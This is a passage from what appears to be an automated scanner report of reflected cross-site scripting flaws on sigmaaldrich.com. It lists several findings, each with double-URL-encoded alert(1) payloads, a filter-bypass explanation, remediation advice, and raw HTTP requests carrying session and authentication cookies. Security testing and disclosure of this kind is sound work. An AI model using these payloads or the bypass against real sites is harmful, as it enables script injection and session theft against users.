Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:46 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/servicescc3c9";alert(1)//3022a9f9e58/basic-research/technical-consulting","E404") ;
   </script>
...[SNIP]...

1.163. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20f7a%2522%253balert%25281%2529%252f%252ffa36f9bea3e was submitted in the REST URL parameter 6. This input was echoed as 20f7a";alert(1)//fa36f9bea3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/basic-research20f7a%2522%253balert%25281%2529%252f%252ffa36f9bea3e/technical-consulting HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:47 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/basic-research20f7a";alert(1)//fa36f9bea3e/technical-consulting","E404") ;
   </script>
...[SNIP]...

1.164. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 911a4%2522%253balert%25281%2529%252f%252f439c0d0c37a was submitted in the REST URL parameter 7. This input was echoed as 911a4";alert(1)//439c0d0c37a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting911a4%2522%253balert%25281%2529%252f%252f439c0d0c37a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:49 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technical-consulting911a4";alert(1)//439c0d0c37a","E404") ;
   </script>
...[SNIP]...

1.165. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb2c1%2522%253balert%25281%2529%252f%252fb1713c9019c was submitted in the REST URL parameter 1. This input was echoed as bb2c1";alert(1)//b1713c9019c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentbb2c1%2522%253balert%25281%2529%252f%252fb1713c9019c/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:33 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentbb2c1";alert(1)//b1713c9019c/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops","E404") ;
   </script>
...[SNIP]...

1.166. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fee1c%2522%253balert%25281%2529%252f%252f47869822d32 was submitted in the REST URL parameter 2. This input was echoed as fee1c";alert(1)//47869822d32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichfee1c%2522%253balert%25281%2529%252f%252f47869822d32/customer-support/customer-service/services/basic-research/technology-workshops HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichfee1c";alert(1)//47869822d32/customer-support/customer-service/services/basic-research/technology-workshops","E404") ;
   </script>
...[SNIP]...

1.167. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47283%2522%253balert%25281%2529%252f%252f3b290623f04 was submitted in the REST URL parameter 3. This input was echoed as 47283";alert(1)//3b290623f04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support47283%2522%253balert%25281%2529%252f%252f3b290623f04/customer-service/services/basic-research/technology-workshops HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
